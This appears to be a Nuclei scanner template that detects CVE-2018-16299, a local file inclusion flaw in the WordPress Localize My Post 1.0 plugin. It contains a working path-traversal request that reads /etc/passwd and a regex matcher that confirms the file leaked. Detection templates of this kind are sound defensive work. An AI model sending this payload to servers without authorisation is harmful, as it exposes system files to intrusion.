48 lines
1.8 KiB
YAML
48 lines
1.8 KiB
YAML
id: CVE-2018-16299
|
|
|
|
info:
|
|
name: WordPress Localize My Post 1.0 - Local File Inclusion
|
|
author: 0x_Akoko,0x240x23elu
|
|
severity: high
|
|
description: |
|
|
WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to read sensitive files on the server.
|
|
remediation: |
|
|
Update to the latest version of WordPress Localize My Post plugin.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/45439
|
|
- https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html
|
|
- https://github.com/julianburr/wp-plugin-localizemypost/issues/1
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16299
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-16299
|
|
cwe-id: CWE-22
|
|
epss-score: 0.02738
|
|
epss-percentile: 0.89516
|
|
cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: localize_my_post_project
|
|
product: localize_my_post
|
|
framework: wordpress
|
|
tags: cve2018,cve,wordpress,lfi,plugin,wp,edb,packetstorm,localize_my_post_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022056d51d6fc9cfa3c7640e2cf5f87480ff24276f614122fe0d7b013a4a15c55153022100fb25142662e4c537cc01d2effca6acbfed88d9958dfe32e560e6bc7954914d4c:922c64590222798bb761d5b6d8e72950 |